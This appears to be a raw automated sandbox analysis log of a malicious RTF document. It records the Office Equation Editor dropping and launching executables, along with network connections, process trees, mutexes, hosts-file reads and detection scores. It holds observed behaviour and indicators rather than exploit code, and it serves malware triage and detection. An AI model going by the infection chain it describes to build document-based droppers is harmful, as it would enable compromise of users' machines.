Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 443
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.229.221.185:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 152.199.21.175:443 -> 192.168.2.22:49287 version: TLS 1.2
Source: unknownHTTPS traffic detected: 152.199.21.175:443 -> 192.168.2.22:49288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.252.156.174:443 -> 192.168.2.22:49344 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.6:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.6:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.210.171.182:443 -> 192.168.2.22:49351 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.102:443 -> 192.168.2.22:49356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.185.102:443 -> 192.168.2.22:49355 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.19:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.60.216.19:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.66:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.66:443 -> 192.168.2.22:49361 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.251.174.164:443 -> 192.168.2.22:49364 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.251.174.164:443 -> 192.168.2.22:49363 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.45.173.110:443 -> 192.168.2.22:49365 version: TLS 1.2
Source: C:\$Windows.~WS\Sources\SetupHost.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MediaCreationTool20H2[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\9697.exeJump to dropped file
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Roaming\9697.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0B1B1 NtQueryLicenseValue,5_2_00A0B1B1
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0B274 NtQueryLicenseValue,5_2_00A0B274
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009A7ACA NtPowerInformation,5_2_009A7ACA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009EB0B2 RtlDosPathNameToNtPathName_U,NtCreateFile,GetProcessHeap,HeapAlloc,NtQueryInformationFile,wcsncmp,GetProcessHeap,HeapFree,NtClose,GetProcessHeap,HeapFree,NtClose,GetProcessHeap,HeapAlloc,GetLastError,GetLastError,NtSetInformationFile,GetProcessHeap,HeapFree,5_2_009EB0B2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009E11C8 GetFileInformationByHandle,NtQueryInformationFile,RtlNtStatusToDosError,SetLastError,WriteFile,5_2_009E11C8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009CD55E NtYieldExecution,GetProcessHeap,HeapAlloc,5_2_009CD55E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009CFABD NtYieldExecution,5_2_009CFABD
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009CCACB NtYieldExecution,5_2_009CCACB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009CFD1E NtYieldExecution,GetProcessHeap,HeapAlloc,5_2_009CFD1E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BDD47 CreateFileW,memset,GetProcessHeap,HeapFree,GetFileInformationByHandle,GetFileInformationByHandleEx,SetFileInformationByHandle,GetProcessHeap,HeapAlloc,_wcsicmp,FindClose,NtSetInformationFile,NtSetInformationFile,RtlNtStatusToDosError,CreateFileW,SetFileInformationByHandle,GetLastError,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetLastError,GetLastError,CloseHandle,GetLastError,DeleteFileW,GetLastError,GetProcessHeap,HeapFree,SetLastError,5_2_009BDD47
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DCD74 CreateFileW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryInformationFile,OpenProcess,NtQueryInformationProcess,GetProcessHeap,HeapAlloc,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetLastError,GetLastError,GetLastError,5_2_009DCD74
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0AE25 LoadLibraryExW,GetProcAddress,NtQueryLicenseValue,FreeLibrary,5_2_00A0AE25
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BE3BE: CreateFileW,DeviceIoControl,GetLastError,CloseHandle,GetLastError,GetProcessHeap,HeapFree,SetLastError,SetLastError,5_2_009BE3BE
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\Windows\Logs\MoSetupJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FF60E5_2_009FF60E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FA1975_2_009FA197
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C41C55_2_009C41C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DD1EE5_2_009DD1EE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F42E05_2_009F42E0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F93D45_2_009F93D4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0F4805_2_00A0F480
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009B95CA5_2_009B95CA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009EF6F25_2_009EF6F2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DC6505_2_009DC650
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F167A5_2_009F167A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009E77835_2_009E7783
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009ED7FE5_2_009ED7FE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009D77F75_2_009D77F7
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F67EE5_2_009F67EE
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C38595_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009B490F5_2_009B490F
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF9425_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F49405_2_009F4940
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F19705_2_009F1970
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00983B8C5_2_00983B8C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB05_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DCB3C5_2_009DCB3C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009E5C925_2_009E5C92
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009F8CAC5_2_009F8CAC
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009EEC405_2_009EEC40
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BCDC65_2_009BCDC6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009D9EBC5_2_009D9EBC
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 009EB6C3 appears 68 times
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 009DB3AC appears 154 times
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 00A0F3B3 appears 45 times
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: String function: 009BD5C3 appears 31 times
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SetupHost.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SetupHost.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SetupHost.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeSection loaded: policymanager.dllJump to behavior
Source: 9697.exe, 00000004.00000002.3354197090.0000000000C00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@10/588@45/14
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A00CAA GetLastError,FormatMessageW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,SetLastError,5_2_00A00CAA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C11E1 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_009C11E1
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A05060 GetDiskFreeSpaceW,5_2_00A05060
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009A9C20 CoCreateInstance,CoCreateInstance,CoCreateInstance,CoCreateInstance,CoCreateInstance,CloseHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,CloseHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetLastError,5_2_009A9C20
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$bYDInO.rtfJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\SetupLog
Source: C:\Users\user\AppData\Roaming\9697.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Microsoft.Windows.Websetup
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\OneSettingQueryMutex+WSD+Setup360
Source: C:\$Windows.~WS\Sources\SetupHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\WdsSetupLogInit
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD097.tmpJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - SELECT Manufacturer, Name, Caption, Architecture, MaxClockSpeed FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 7bYDInO.rtfVirustotal: Detection: 21%
Source: 7bYDInO.rtfMetadefender: Detection: 29%
Source: 7bYDInO.rtfReversingLabs: Detection: 38%
Source: 9697.exeString found in binary or memory: %s /InstallFile "%s"
Source: 9697.exeString found in binary or memory: /InstallFrom
Source: 9697.exeString found in binary or memory: /Install %s
Source: 9697.exeString found in binary or memory: /Install
Source: SetupHost.exeString found in binary or memory: /InstallFile
Source: SetupHost.exeString found in binary or memory: /Install
Source: SetupHost.exeString found in binary or memory: /InstallFOD
Source: SetupHost.exeString found in binary or memory: /InstallLangPacks
Source: SetupHost.exeString found in binary or memory: /InstallPrivates
Source: SetupHost.exeString found in binary or memory: /InstallDrivers
Source: SetupHost.exeString found in binary or memory: /LaunchSetup
Source: SetupHost.exeString found in binary or memory: /LaunchSetupWithConfig
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\9697.exe C:\Users\user\AppData\Roaming\9697.exe
Source: C:\Users\user\AppData\Roaming\9697.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe 'C:\$Windows.~WS\Sources\SetupHost.Exe' /Download /Web
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://go.microsoft.com/fwlink/?LinkId=530045
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2472 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\9697.exe C:\Users\user\AppData\Roaming\9697.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe 'C:\$Windows.~WS\Sources\SetupHost.Exe' /Download /Web Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2472 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeAutomated click: Accept
Source: C:\$Windows.~WS\Sources\SetupHost.exeAutomated click: Next
Source: C:\Users\user\AppData\Roaming\9697.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: SetupPrep.pdbGCTL source: 9697.exe, 00000004.00000000.2102966860.0000000001311000.00000020.00020000.sdmp
Source: Binary string: SetupHost.pdbGCTL source: SetupHost.exe, 00000005.00000000.2112960052.000000000099C000.00000020.00020000.sdmp
Source: Binary string: SetupHost.pdb source: SetupHost.exe
Source: Binary string: SetupPrep.pdb source: 9697.exe
Source: SetupHost.exe.4.drStatic PE information: 0x655C0AAC [Tue Nov 21 01:41:00 2023 UTC]
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FDE32 __EH_prolog3_GS,memset,memset,memset,memset,memset,RtlGetVersion,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,SetLastError,GetLastError,LoadLibraryW,GetProcAddress,GlobalFree,GetLastError,GetLastError,RegOpenKeyExW,RegCloseKey,CompareStringW,CompareStringW,GetLastError,GetLastError,FreeLibrary,RegCloseKey,5_2_009FDE32
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: real checksum: 0x1290880 should be:
Source: MediaCreationTool20H2[1].exe.2.drStatic PE information: section name: .boxload
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0F390 push ecx; ret 5_2_00A0F3A3
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009843D8 pushad ; iretd 5_2_009843D9
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wdsimage.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\SetupMgr.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\DiagTrack.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\SetupCore.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\DU.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wdscsl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wdsclientapi.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wpx.dllJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MediaCreationTool20H2[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wdscore.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\MediaSetupUIMgr.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\SetupHost.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\DiagTrackRunner.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\WinDlp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wdsutil.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\pidgenx.dllJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\9697.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\unbcl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\Diager.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\setupplatform.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeFile created: C:\$Windows.~WS\Sources\wdstptc.dllJump to dropped file
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setuperr.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\setupact.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setuperr.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$WINDOWS.~BT\Sources\Panther\setupact.logJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeFile created: C:\$Windows.~WS\Sources\Panther\Eula.rtfJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
